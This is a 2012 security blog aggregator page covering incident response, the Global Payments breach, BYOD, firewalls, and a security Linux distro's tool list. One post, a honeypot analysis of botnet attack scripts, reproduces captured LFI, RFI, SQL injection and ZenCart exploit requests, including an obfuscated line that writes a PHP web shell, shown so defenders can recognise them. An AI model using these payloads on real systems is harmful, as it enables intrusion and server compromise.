Security Bloggers Network

How To Deal with a Security Incident

Cindy Valladares — Thu, 17 May 2012 21:00:06 +0000

“Incidents are bound to happen, there’s no avoiding it!” Are you prepared to deal with a security breach? Infosec expert and ‘cynic’ Javvad Malik interviews Brian Honan (@BrianHonan on Twitter) internationally recognized information security expert, during Infosecurity Europe conference to offer tips on how to respond to security incidents. First tip? Identify if the problem [...]

Making Mobile Health Possible, Part 2

VPN Haus — Thu, 17 May 2012 20:43:19 +0000

Earlier this week, we explored the innumerable medical breakthroughs that could stem from mobile health innovations. Today, let’s consider the security considerations to enable this.

Security Must Be Paramount

Yet, considering how sensitive and valuable medical information is, proper precautions must be taken to secure this data before mobile health can become mainstream. For instance, if hackers or disloyal employees scan or manipulate health data that is sent via mobile applications, the consequences can range from embarrassment to, frankly, death. It’s easy to understand why ensuring these connections are secure is absolutely critical.

Mobile health, however, requires special VPN functionality. For instance, it requires both extremely high security and flexibility. After all, a healthcare application might use a potentially insecure public Wi-Fi network to communicate with the IT system of a hospital or a medical office. In order to maintain security in such a scenario, the VPN client must be able to automatically adapt to these security settings.

The same requirements apply to smartphones and tablets used by nurses in elderly or outpatient care. Such solutions relay patient information—from homes or hospitals—onto the central database, typically via a VPN connection. And so again, the VPN connection must be able to flexibly adapt to various network connections, given some of amount of unpredictability of the locations. Also, considering that many healthcare workers are not trained in technology, the VPNs must be easy to use, so convenience is not traded for security.

There’s no doubt mobile health offers innumerable opportunities to lower the cost of healthcare and infinitely improve efficiencies and convenience. The question is, can we ensure that this is done securely?

Duck … Duck … VI

grecs — Thu, 17 May 2012 20:00:44 +0000

Following-up from our post the other day on DuckDuckGo, I found they have a lot of nice search features beyond just their privacy benefits. In particular, one of the nice things I really like are the custom keyboard shortcuts. This really shows that they have kept the techie in mind when designing the search interface.

They basically follow the familiar “vi” syntax to keep your hands on the keys for improved efficiency. There are dozens of different shortcuts but the bullets listed below provide a quick flow-based rundown of how I’ve been using them to cut through my workload faster. DuckDuckGo doesn’t do everything so I do still rely on a few Firefox-based shortcuts as well (i.e., the ones not bolded below). Note that this workflow is based on OS X so if needed I’ve also included the equivalent Windows shortcuts.

Command-K: This shortcut moves the focus up to the search text area. As I’ve noted in the previous post I have DuckDuckGo setup as my default search engine there.
Backslash (\): If you know the first result is going to be where you want to go, you can also use their “Feeling Ducky” feature by preceding the search with a backslash (e.g., \ nova infosec calendar).
Option-Enter: On Mac you can usually hit Option-Enter when done entering the search terms and the browser will conveniently open up a new tab with the results. Windows uses Alt-Enter instead.
j & k: Ahhh … good old vi. These keys move your focus up and down the search results.
tick (‘): Once you have focused on a result you want to view, the tick opens that selection up in a new tab. “v” is another option as sometimes Firefox’s Quick Find feature overrides the tick. You can also use the browser-based Command-Enter (Alt-Enter on Windows) shortcut while on the selection.
Space: When looking through the tab you just opened up, this shortcut is useful for quickly paging down in most situations.
Command-W: So that result wasn’t any good? Just hit Command-W to close that tab and return to your search results. Windows does then same thing but substitutes Control for Command.
h: Checked out a bunch of results and not satisfied with the returned results? Hitting “h” instantly returns you to the DuckDuckGo’s webpage search box to adjust your terms.
Esc: After some contemplation you can’t think of how to change your search terms and just want to return to perusing more of the previous results. Then just hit Esc and you’re there.

If you need a quick reference, DuckDuckGo often displays some of the most popular shortcuts on the right side of its pages as shown above. And should you need more info then you can head on over to their Keyboard Shortcuts article to get a full rundown of all the commands. You may also find their Syntax article useful as well.

#####

Have you discovered anything interesting in using DuckDuckGo? Let us know in the comments below. Today’s post pic is from Raffy.ch. See ya!

[Honeypot Alert] Inside the Attacker’s Toolbox: Botnet Web Attack Scripts

Ryan Barnett — Thu, 17 May 2012 19:50:06 +0000

Have you ever wondered what script/code/tool was behind the automated web attacks that you see in your web server log files? This blog post will shed some light on one of the most common tactics used by web attackers: Botnet Web Attack Scripts.

Attack Sources: Compromised Web Servers

What we are finding when analyzing attacking IP address (as part of our IP Reputation data feed for the commercial ModSecurity rules) is that a large portion of these attacking sources are actually compromised web servers. Attackers are exploiting various web application vulnerabilities through attacks such as RFI to download and execute attacker code.

Botnet Clients

If the RFI attack succeeds, then botnet client will log into an IRC channel from the web server host.

Identify Targets: Search Engine Queries

Once the client is logged into the IRC channel, the operator can send commands for the client to execute. Such as to run Search Engine queries to identify other vunerable web servers. Here is a list of Search Engines that they will use:

Local File Inclusion (lfi) Attacks

Here is a snippet of the "lfi" function that will take the Search Engine queries and executes various exploit payloads. Notice the bolded sections match some of the LFI examples at the beginning of the blog post:

Here is how these attacks looks when received by our honeypots:

GET /cart.php?a=antisec&templatefile=../../../../../../../../../../../../../../../etc/passwd%0000 HTTP/1.1
GET /cart.php?a=psxteam&templatefile=../../../../../../../../../../../../../../../etc/passwd%0000 HTTP/1.1
GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1
GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1
GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1
GET //components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1
GET //components/com_simpleboard/file_upload.php?sbp=/proc/self/environ HTTP/1.1
GET //components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1
GET //components/com_simpleboard/file_upload.php?sbp=/proc/self/environ%0000 HTTP/1.1
GET //components/com_simpleboard/file_upload.php?sbp=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1

Remote File Inclusion (rfi) Attacks

Here is a snippet of the !rfi function that will attempt remote file inclusion attacks:

Here is how these attacks looks when received by our honeypots:

GET /admin///?_zb_path=http://www.REDACTED.de/plugins/rik.jpg?? HTTP/1.1
GET /admin//?_zb_path=http://www.REDACTED.com/uccl-sy/images/byroe.jpg?? HTTP/1.1
GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/black.jpg?? HTTP/1.1
GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/daster.jpg?? HTTP/1.1
GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j1.txt?? HTTP/1.1
GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j2.txt?? HTTP/1.1
GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j3.txt?? HTTP/1.1
GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/topi.jpg?? HTTP/1.1
GET //ask_password.php?dir=http://www.REDACTED.hu/e107_images/fileinspector/banner.jpg??? HTTP/1.1
GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.REDACTED.com.br/v3/pgm//common/metabase/id.gif?????????????? HTTP/1.1
GET /bad_link.php?theme_path=http://REDACTED.kr/bbs//icon/dd--.gif?????? HTTP/1.1
GET /bad_link.php?theme_path=http://www.REDACTED.gov.tw//appserv/c2d.gif????? HTTP/1.1
GET /bad_link.php?theme_path=?src=http://REDACTED.com.airatrip.com/temp/phantom.php HTTP/1.1
GET //bbs///////delete_all.php?board_skin_path=http://www.REDACTED.org/wp-content/languages/zfxid1.txt??? HTTP/1.1

SQL Injection (sqli) Attacks

Here is a snippet of the !sqli function that executes SQL Injection attacks:

Here is how these attacks look in our honeypot logs:

GET /zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1
GET /index.php?id=' HTTP/1.1
GET /index.php?keyword=' HTTP/1.1
GET //log.php?id=' HTTP/1.1
GET /logs/error_log/submitComment.php?DOCUMENT_ROOT=' HTTP/1.1
GET /logs/submitComment.php?DOCUMENT_ROOT=' HTTP/1.1
GET //mail.php?id=' HTTP/1.1
GET /order.php?id=' HTTP/1.1
GET /osc/shopping_cart.php?id=' HTTP/1.1
GET /page.php?id=' HTTP/1.1
GET /product.php?id=' HTTP/1.1
GET /produto.php?id=' HTTP/1.1
GET /shop.php?id=' HTTP/1.1
GET /shopping_cart.php?cadid=' HTTP/1.1
GET /shopping_cart.php?pid=' HTTP/1.1
GET /submitComment.php?DOCUMENT_ROOT=' HTTP/1.1
GET //upload.php?id=' HTTP/1.1

ZenCart Attacks

Here is a snippet of the !zen function that executes attacks against ZenCart vulnerabilities:

Here is how these attacks look when they are received by our honeypots:

POST /store//admin/sqlpatch.php/password_forgotten.php?action=execute
...
query_string=insert into admin (admin_id, admin_name, admin_email, admin_pass) values (30, 'wew', 'antisux.com', '617ec22fbb8f201c366e9848c0eb6925:87');

Failed Botnet Attack Commands

When an attacker wants to execute a specific type of attack, they will issue commands from the IRC botnet channel using this syntax - > !cmd. Here is a sampling of the functions available:

Notice the syntax of using the exclamation point (!) before the function name. While reviewing the honeypot/sensor logs, we see a fair amount of examples where the attack code is not properly executing the function call but instead just sending the text in the live HTTP requests. Here are some examples:

69.65.40.230 - - [10/May/2012:07:34:36 -0400] "GET /!lfi../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
188.165.237.143 - - [01/Apr/2012:15:03:18 +0900] "GET /!rfitest?? HTTP/1.1" 404 214
188.165.237.143 - - [01/Apr/2012:15:03:20 +0900] "GET /!rfihttp://kortech.cn/bbs//skin/zero_vote/fx29id2.txt???? HTTP/1.1" 404 259
46.105.99.149 - - [24/Jan/2012:08:10:04 +0100] "GET /!sql' HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
96.250.100.147 - - [14/Mar/2012:07:07:42 +0900] "POST /!zen HTTP/1.1" 404 284

If you see these types of requests within your log file, you can be assured that a botnet client is attacking your site.

Global Payments Breach Now Dates Back to Jan. 2011

BrianKrebs — Thu, 17 May 2012 19:11:03 +0000

The data breach at Atlanta-based credit and debit card processor Global Payments just keeps getting bigger. Earlier this month, I reported that Visa and MasterCard were alerting banks that the breach extended back to June 2011. Now it appears the breach jeopardized cards processed by Global as far back as January 2011.

The latest disclosure, detailed in a story at BankInfoSecurity.com, now aligns with the timeline outlined by anonymous hackers who reached out to me after I broke the story on this breach back at the end of March. Global has disclosed relatively little about the breach, and has sought to downplay the severity of it. Initial reports suggested that more than 10 million card accounts were compromised in the breach, yet Global insists fewer than 1.5 million were taken. Recent reports by The Wall Street Journal put that figure closer to 7 million stolen card accounts.

Shortly after the breach, Global executives were complaining about “rumor and innuendo” in press reports about the incident. I borrowed that quote for the title of a follow-up blog post, which included claims from a hacker who told me he was reaching out because he felt Global was hiding the true extent of the breach. He told me that he was part of a group that had been inside of Global since just after the new year in 2011. From that story:

The hacker said the company’s network was under full criminal control from that time until March 26, 2012. “The data and quantities that was gathered [was] much more than they writed [sic]. They finished End2End encryption, but E2E not a full solution; it only defend [sic] from outside threats.” He went on to claim that hackers had been capturing data from the company’s network for the past 13 months — collecting the data monthly — gathering data on a total of 24 million unique transactions before they were shut out.

Global has refused to comment further on the incident, referring people to a Web site with a series of Q&As for various parties potentially impacted by the breach. I guess only time will tell whether the hackers were right about the number of compromised transactions as well.

The Best Information Security Advice (European Flavor)

Cindy Valladares — Thu, 17 May 2012 18:28:55 +0000

As hundreds of security professionals gathered for the 2012 Infosecurity Europe conference in London, infosec expert and ‘cynic’ Javvad Malik surveyed the pros with a simple question: “What is the best security advice you have ever been given?” A surprising handful of answers revolve around items as simple as passwords. Check out this video to see [...]

Enhancing Web Application Security Testing with IBM Security AppScan Glass Box

Ory Segal — Thu, 17 May 2012 17:51:07 +0000

I have already blogged about AppScan's Glass box (IAST / Runtime Analysis) capabilities a while ago, but I've recently recorded a short demonstration of how to install and run a Glass box scan with IBM Security AppScan Standard.

Here's the Youtube movie (don't forget to watch it in 720p/HD, full screen)

What Would Willie Sutton Say Now?

Tom Stuart — Thu, 17 May 2012 17:08:00 +0000

As most know, Willie Sutton was the bank robber who, as legend has it, when asked why he robbed banks replied, “Because that is where the money is.” He denies ever saying it, but the point behind the quote is valid. That is why it is not surprising that the Verizon 2012 Data Breach Investigations Report (DBIR) - a continuing fount of good findings - found:

“almost all incidents in which very large amounts of data are compromised involve servers”

Most of the valuable data resides on the servers, so you’d expect them to be involved in a high fraction of the breaches.

I think about this in context of a recent trend I have been hearing about regarding the issue of how to secure user devices in a Bring Your Own Device (BYOD) world. Unlike a year ago when security executives were wondering what to do about BYOD, this year, many have embraced BYOD. Further, their attitude is that they don’t want to manage the user devices. They are resigned to this attitude because they don’t have the resources to manage all these disparate devices. Instead they will just put the proper protection and access controls in place for sensitive systems and data. They want to keep Willie Sutton from having access to the bank vault.

Unfortunately, another finding from the DBIR describes a flaw in this approach. The finding is this:

“We all know, of course, that user devices store and process information too. Furthermore, most organizations have a lot more of them than they do servers, and they’re often widely distributed, highly mobile, less restricted, and—perhaps more importantly—controlled by end users (a shudder travels down the spine of all the admins out there). For all of these reasons and more, user devices frequently factor into data breaches in some manner or another and contribute to a hefty chunk of overall data loss.

Sometimes they are the endpoint from which data is taken, but more often they simply provide an initial “foothold” into the organization, from which the intruder stages the rest of their attack. A common scenario—especially for larger organizations—involves the installation of a keylogger on a workstation or laptop in order to steal the user’s username/password for an internal application server.“

This means that protecting the sensitive data stored on servers also requires that the organization provide for security on user devices, both on and off the network. This also means that the latest trendy network based approaches to detecting malware using sandboxes or monitoring C&C traffic also fall short. They provide no protection of user devices away from the corporate network--when at home, when traveling or at a coffee shop. The only thorough way to protect these devices and not allow them to be the gateway into the most sensitive repositories of corporate data is to have a constantly vigilant presence on each endpoint - the kind of protection that is provided by Sourcefire’s FireAMP product.

In order to successfully get to the money stored in the vault, Willie Sutton needed to enter through the door and get past the teller. In the cyber world, let’s not leave the door open and the bank unattended.

Operating System Infection Rates – Slight Change in the Trend

Tim Rains - Microsoft — Thu, 17 May 2012 16:51:00 +0000

Since releasing the new Microsoft Security Intelligence Report (SIR volume 12) a few weeks ago, one of the top questions I have been asked is about the new malware infection rate data for Windows operating systems.

Why is Windows XP Service Pack 3’s malware infection rate lower than that of Windows Vista SP1?

There are likely several factors contributing to this trend, but I’ll try to provide an educated guess on some of the contributing factors.

Malware that used Autorun feature abuse to infect systems were especially successful on Windows XP based systems. About a year ago I wrote an article called Defending Against Autorun Attacks in which I outlined what Microsoft was doing to fight these threats and shared some of the preliminary results of these efforts. To summarize, Microsoft released security updates for Windows XP and Windows Vista that hardened the Autorun feature on these platforms the same way it is hardened on Windows 7 by default. Shortly after this security update was released we could see a precipitous decrease of Autorun related malware infections on Windows XP and Windows Vista systems.

...(read more)

Nitrozac and Snaggy: Fat Resume

Marc Handelman — Thu, 17 May 2012 16:30:00 +0000

via the comic genius of Nitrozac and Snaggy at The Joy of Tech™

Grimes On Firewalls Has It All Wrong

ashimmy@hotmail.com (Alan Shimel) — Thu, 17 May 2012 16:10:44 +0000

I was all set to write a post today commenting on Ellen Messmer’s article about Forrester’s picks for winner and losers in security. But that post will have to wait. Instead I am compelled to chime in on the firestorm that Rodger Grimes has ignited with his “firewalls are dead” article of a few days ago.

I didn’t comment on Rodger’s original article because after hearing my friend Richard Stiennon declare so many security technologies dead over the years, one more pundit calling something dead is just not something to get excited over. Lets face it, you know what they say about pundits (or was it analysts), we all have one

But that didn’t stop others from calling Rodger out. My friends at Securois, Mike Rothman in particular had something to say, a few other security bloggers mentioned it, heck even Richard Stiennon on his way down under tweeted on it. But I thought the best response was by my friend and colleague Jody Brazil of Firemon. Now for those of you who don’t know, I work with Firemon so I may be partial to Jody’s view. Truth be told I may have even seen a rough draft of the post and put my 2 cents in before it was published. To me that was a case of enough said.

But now Rodger has come back with another salvo defending his position. After reading it, I can’t help myself. I have to jump in. Besides the fact that I think Rodger is flat out wrong, I feel it necessary to point out some weakness in his arguments:

1. Flat out dismissing firewall mismanagement – Yes it is easy with the stroke of a pen to just discount this very important part of Jody’s original post. But the fact remains that firewall mismanagement is still one of the biggest factors if not the biggest in attacks being successful that a better managed firewall could have and should have stopped. So before dismissing, at least give it its due.

2. The Verizon Report is all about big companies – Yes it is only is based on 855 breaches, but the fact is that almost 2/3’s of those 855 breaches happened at companies with under 100 employees! That hardly qualifies as large enterprise accounts. If you go up to companies under 1000 employees (classic SMB) the number is even higher. So you can’t dismiss the Verizon findings by saying that this only applies to large companies, it is just not the fact.

3. The browser did it, blame the browser – This one reminded me of if we set the firewall to block all traffic, we would not have security incidents. Yes the browser is a nexus for attack, but it is a nexus because it is a fundamental factor in the equation. You can’t take the browser out of the mix and still have an Internet as we know it. So saying it is the browser’s fault and the firewall doesn’t help the browser is just not sound logic. The browser goes with the Internet and it introduces it own set of challenges. Blaming the firewall for not fixing the browser just doesn’t make sense.

4. The human hacking came later – Wrong again. It is the human hacking which comes first. It is the spear phishing or otherwise targeted attack which is genesis of most security incidents. Grimes points to the large AV vendors as proof of his position. Well lets look at the recent Symantec Internet Security report. They clearly show that targeted attacks against humans (by email, twitter or other social media) is a primary vector for many security incidents. At the end of the day, the weakest link is still the person behind the keyboard. Heck after getting rid of the firewall, lets get rid of the people, then we would really be safe. Of course who would use all of those browsers?

5. Firewalls are a victim of its own success – Again the logic here is flawed. Are firewalls the new polio or smallpox vaccine? Have we eliminated the scourge of attacks that firewalls have stopped, so now we can retire them? Of course not. Firewalls (especially well managed ones) are out there stopping garden variety attacks day in and day out. Yes NGFW are an evolution up from what firewalls used to be, but the threats and attacks that firewalls have been stopping for years have not gone away, people like Rodger just take them for granted because firewalls are on call doing their job 24/7/365.

So it is not yet time to give the firewall its gold watch and send it to a condo in Florida. There is still plenty of life and good security left in those boxes and the future for them is brighter then ever.

I would love to discuss this further and invite Rodger, Jody and if anyone else would like to join in to a podcast. Let me know if you are interested!

Atténuation du Signal, S’il Vous Plaît

Marc Handelman — Thu, 17 May 2012 16:00:00 +0000

Wireless 802.11x signal attenuator surfaces, this time, appearing as wall paper. Outstanding.

Play it again OpenSAMM – The Fundamental Things Apply

Adam Montville — Thu, 17 May 2012 15:30:50 +0000

OK, so “play it again OpenSAMM” is a twist on a misquote from Casablanca, but the song Sam sings in that movie does say, “fundamental things apply.” One fundamental in our world, which seems often overlooked, is that of software assurance. Enter OWASP and it’s Open Software Assurance Maturity Model (OpenSAMM). Before you roll your [...]

Training the Next Generation of Hacktivists

Rob Rachwald — Thu, 17 May 2012 15:24:01 +0000

It’s a well-known fact that hackers learn their trade in underground forums that feature tutorials, videos and other instructional material. Traditionally, such material was designed to help hackers profit. Recently, we came across a nice library that was assembled by a hacktivist group. This group used to have quite a large site explaining about how to hack, forums for new hackers and exploits. (The site is no longer active and the activity of its members is unknown.) First, to get an idea of what this group did, here’s a screenshot from their Twitter feed: In essence, their purpose was clear:...

Sir Humphrey 3, Ian Watmore 0 – is this end of the UK Office of the President ?

Philip Virgo — Thu, 17 May 2012 15:23:11 +0000

Iam Watmore played a unique role in the attempt to create a UK equivalent of the Office of President: from the Anderson/Accenture support for the New Labour project through to a return to the centre of power after the transition to a coalition government. However, the idea that the delivery of public services should be outsourced under the supervision of Cabinet Office was always alien to the tribes of Whitehall. The CIO and CTO collegiate approach, always fitted much better with the culture of Whitehall, if the objective was to transform the delivery of public services rather than "merely" centralise power into the hands of the triumvirate of Cabinet Office, Treasury and Number 10.

Now that the money has been spent, the future mortgaged and a second, much deeper, round of cuts is about to begin, it will be interesting to see who is brought in to help terminate the inflexible PFI contracts that stand in the way of a return to fiscal health. The alternative may well include pain on the scale of that in Greece and Ireland, with a Geddes Axe style 10% cut in public sector wages and pensions.

I personally think Francis Maude could do a lot worse than bring Richard Grainger back to complete the job he started - when he held the NHS contractors to their side of the nonsense contracts he inherited - and his former employer, Accenture, was the first to sue for peace and walk away. However, in parallel with the cuts to "stop the bleeding" we do have to start rebuilding for the future.

If the bulk of the Civil Service is to be sent home for the summer, they should be enrolled, to short order, on distance learning courses on Finance and Business Administration using some of the excellent material available from the Open University or Strathclyde Business School as part of the long overdue implementation of the Fulton report .

And after that summer break, will we have seen a seismic shift in power from Whitehall to Town Hall and "Nanny knows best" to "self help", turning the "Big Society" from rhetoric into reality. I fear, however, that I may see pigs practicising synchronised swimming in flood water before then.

Interview with Dan Guido at SOURCE Boston 2012 – Part 3

Niru Raghavan — Thu, 17 May 2012 15:18:42 +0000

In this, our third and final interview segment with Dan Guido, Co-Founder and CEO of Trail of Bits, Dan talks about security threats, and attack vectors that pose the greatest threat to enterprises today. Watch the interview below.

We also added in a quick summary to cover the highlights of the interview.

How can organizations prepare to face security threats?
Dan states that organizations should look at all the attacks that are happening in the industry they are in, (from peers, data releases from security companies), so they can learn from the lessons that other companies have experienced. Dan states that there is not enough sharing of information in the industry about attacker techniques, tactics and procedures that have been used to perform compromises. Companies need to collect and analyze attack data, understand what hackers are doing, and then utilize that information to develop defenses that work against the techniques being used. Security programs should be able to trace back to actual reductions in data loss.

Which attack vectors pose the greatest threat to enterprises today?
Dan stresses the importance of protecting the entire enterprise from threats, not just protecting one single application. That said, he also notes that attackers interested in financial fraud or credit card theft will be focused on compromising individual applications. To defend against them, enterprises may want to use dynamic web scanning, or source code auditing per application.

To view the other interviews with Dan Guido posted as part of this series, click on the links below.

1. Interview with Dan Guido on Vulnerabilities
2. Interview with Dan Guido on Mobile Platforms and BYOD

Let us know how you liked this interview series with Dan Guido, and if you have any suggestions for other hot topics you would like to see industry experts discuss.

[New White Paper]Vulnerability Management Evolution

mrothman@securosis.com — Thu, 17 May 2012 15:18:27 +0000

Organizations have traditionally viewed vulnerability scanners as a tactical product, largely commoditized, and only providing value around audit time. How useful is a 100-page vulnerability report to an operations person trying to figure out what to fix next? Though those 100-page reports make auditors smile, as they offer a nice listing of all the audit deficiencies to address in the findings of fact. The tide is definitely turning. We see a clear shift from a largely compliance-driven orientation to a more security-centric view. We’ve documented our views on this evolution to a vulnerability/threat management platform in the paper Vulnerability Management Evolution.

No organization, including the biggest of the big, has enough resources. So you need to make tough choices. Things won’t all be done when they need to be. Some things won’t get done at all. So how do you choose? Unfortunately most organizations don’t choose at all. They do whatever is next on the list, without much rhyme or reason determining where things land on it. It’s the path of least resistance for a tactically oriented environment. Oil the squeakiest wheel. Keep your job. It’s all very understandable, but not very effective.

Optimally, resources are allocated and priorities set based on their value to the business. In a security context, that means the next thing done should reduce the most risk to your organization.

We’d like to thank all of our sponsors for supporting our research, including nCircle, Qualys, Rapid7 and Tenable. As long as compliance is in play, you’ll need to scan for vulnerabilities. At least make some use of a more functional platform to do that and more.

Download: Vulnerability Management Evolution

The paper is based on the following posts:

- Mike Rothman (0) Comments

Utah Governor Fires Tech Director, Brings In Cyber Security Czar

Tim Whitman — Thu, 17 May 2012 15:12:32 +0000

Gov. Gary Herbert apologized to the 780,000 victims of the health data security breach on Tuesday.

To restore the public’s trust, he announced Tuesday that he fired Department of Technology Services director Stephen Fletcher and hired an ombudsman to shepherd victims through the process of protecting their identities and credit.

“The people of Utah rightly believe that the government will protect them, their families, and their personal data. When they interface with us that is in fact our charge,” Herbert said at an afternoon news conference, adding that one of his family members was among those whose information was compromised.

Click for complete article >>

Hack Naked TV Episode 35

PaulDotCom — Thu, 17 May 2012 15:09:55 +0000

In this episode we discuss the origin of legacy vulnerabilities. We also discuss the Amnesty International hack and how it takes a special jackass to hack a charity.

Links for this episode:

Avira AV bricks Windows systems

Lion passwords in the clear

Amnesty International site hacked

Offensive Countermeasures at BlackHat

Links to cool stuff our awesome sponsors are providing:

CloudPassage offers a free Basic version of Halo that includes extensive cloud security features, such as host-based firewalls, vulnerability management, security event alerting, server account management and intrusion detection. Halo works with any cloud provider and makes server security portable across environments. The convenient Halo portal allows you to manage all your security from one screen, whether it's in public, private or hybrid clouds – even traditional data centers.

Check it out here

Manage your Big Data with the most scalable log & security intelligence platform for the Enterprise & Cloud.Don’t take our word. Try it for yourself! For a limited time, download here

Video Feeds:

New Research From Fidelis Security Systems And IANS Shows Heightened Need For Advanced Threat Defense

Dark Reading — Thu, 17 May 2012 15:08:00 +0000

Survey underscores the heightened risk associated with content-layer threats

Cyber romance scams cost US victims $50 million in 2011

Lisa Vaas — Thu, 17 May 2012 14:55:20 +0000

Who doesn't love a good romance story? Oh, probably those who have ended up losing out on a lot of money.

Cloud Security Benefits for SMBs in India

trusted-cloud — Thu, 17 May 2012 14:49:00 +0000

Posted by: Richard Saunders, Director, Trustworthy Computing

Earlier this week we shared news around the security benefits small to mid-size businesses (SMBs) gain from using the cloud in both the United States and Singapore. Additional data focusing on SMBs in India shows that improved security, time savings and cost savings are all benefits Indian SMBs using the cloud experience as well.

...(read more)

Academia must be part of the skills crisis solution

Editors — Thu, 17 May 2012 14:45:47 +0000

In preparation of the launch of the (ISC)2 EMEA Advisory Board, Iâ€™ve had numerous conversations with people about the...

What Now

Christian — Thu, 17 May 2012 14:14:47 +0000

I’ll apologise up front for the potentially non-security focus of this post, but I thought it was worthwhile to discuss a few things whilst I had WordPress in the forefront of my mind.

After almost five years of working as part of an internal security consulting team for a fairly large bank I decided to hand in my notice and jump into a fresh new venture. For those that don’t know me personally you’ll have to excuse the brief rant about Asterisk Information Security, a company that I am so deeply proud to have helped found with a group of amazing and talented individuals. You see, living in Perth, Australia poses some interesting challenges for those working in security. Not wanting to bad mouth my quaint city, because I love Perth through and through and couldn’t imagine living anywhere else, but I feel we sometimes have what I’ve titled the “Perth-delay”. That is, in general, the understanding, addressing and focus on security problems seems to lag behind the rest of Australia, which sometimes (though of course not always), seems to lag behind the rest of the world.

This phenomena is in no way without exceptions, because that is certainly the case, we have a tonne of excellent and amazing security people, and perhaps per-capita Australia is in fact swinging above its weight, but I look around various businesses in Perth (and if you follow Australian financial news, you’ll know that WA is kicking some serious ass. Some financial analysts have started to have to remove WA statistics because the outlying nature of our ‘boom’ is impacting their work), and I’m amazed that not more companies like Asterisk exist. Sure, there are firms that have security expertise, some that have great people, but none that have a 100% focus on information security, from information security management, through security architecture, infrastructure, assessments and application security, that are located entirely here in Perth. It’s this that makes me the most excited.

So what does this mean for un-excogitate.org? Well, it just means I’m splitting myself a little bit, this domain, and this blog will still remain, but as I’m trying to focus my technical efforts through Asterisk, it’ll likely be there. What about all the BeEF stuff? Well, we’ve also recently set up a blog over there too, which if you haven’t checked out, you certainly should.

What else has been going on? I was super fortunate to be over in Sydney for OWASP’s AppSec APAC conference last month. It was a great experience to meet a bunch of awesome people, re-meet a different bunch of awesome people, and get on my high-horse about BeEF. My talk, “Shake Hooves with BeEF” went down well, you can grab my deck (and a bunch others) over here.

Thank you all for your support, and I hope to keep you informed on how all this pans out in the future.

-c

Backups are good – but don’t forget to check your backups work [VIDEO]

Graham Cluley — Thu, 17 May 2012 14:10:03 +0000

The "Toy Story 2" movie was nearly lost forever because of failing backup software. Watch the video to find out the story, and how the classic animated movie was recovered.

Fascinating Voltage trivia

Luther Martin — Thu, 17 May 2012 14:00:00 +0000

It turns out that Voltage is different from many other companies. It's even quite different from many Silicon Valley pre-IPO tech companies. In particular, it turns out that at least two Voltage employees are actually ordained ministers and one used to be a professional gambler.

Try to find that particular combinations of backgrounds anywhere else.

Mandragora 2012.1 has arrived

magian — Thu, 17 May 2012 13:59:59 +0000

I have finally put the finishing touches on Mandragora 2012.1. It is built upon Ubuntu 12.04 LTS 32-bit and uses GNOME3 Classic as it’s desktop environment. The project can be downloaded as a Live ISO or Virtual Appliance. Go check it out at http://code.google.com/p/mandragora/

Short List of Installed Security Applications

OpenVAS – The world’s most advanced Open Source vulnerability scanner and manager
OWASP ZAP – An easy to use integrated penetration testing tool for finding vulnerabilities in web applications
W3af – Framework to find and exploit web application vulnerabilities
Nikto – Web server security scanner
Spikeproxy – Web application security testing proxy
Web-sorrow – A remote web scanner for misconfig, version detection, and server enumeration tool writen in perl
Wireshark – Network traffic analyzer – GTK+ version
Tshark – Network traffic analyzer – console version
Nmap – The Network Mapper
Zenmap – The Network Mapper Front End
Scapy – Packet generator/sniffer and network scanner/discovery
Netexpect – Network Expect, a framework for manipulating network packets
Netcat – TCP/IP swiss army knife
Cryptcat – A lightweight version netcat extended with twofish encryption
Hping3 – Active Network Smashing Tool
Sqlmap – Automatic SQL injection and database takeover tool
Bless – A full featured hexadecimal editor
Dcfldd – Enhanced version of dd for forensics and security
Foremost – Forensics application to recover data
Guymager – Forensic imaging tool based on Qt
Scalpel – A Frugal, High Performance File Carver
DFF – Powerful, efficient and modular digital forensic framework
Tcpxtract – extracts files from network traffic based on file signatures
Gddrescue – The GNU data recovery tool
Testdisk – Partition scanner and disk recovery tool
Rifiuti2 – A MS Windows recycle bin analysis tool
Pasco – An Internet Explorer cache forensic analysis tool
Vinetto – A forensics tool to examine Thumbs.db files
Unhide – Forensic tool to find hidden processes and ports
Snowdrop – Plain text watermarking and watermark recovery
Chntpw – NT SAM password recovery utility
John the Ripper – Active password cracking tool
Ophcrack – Microsoft Windows password cracker using rainbow tables
Fcrackzip – Password cracker for zip archives
PDFcrack – PDF files password cracker
PDFchain – Graphical user interface for the PDF Tool Kit
Dsniff – Various tools to sniff network traffic for cleartext insecurities
Hydra-gtk – Very fast network logon cracker – GTK+ based GUI
Kismet – Wireless 802.11b monitoring tool
Pyrit – GPGPU-driven WPA/WPA2-PSK key cracker
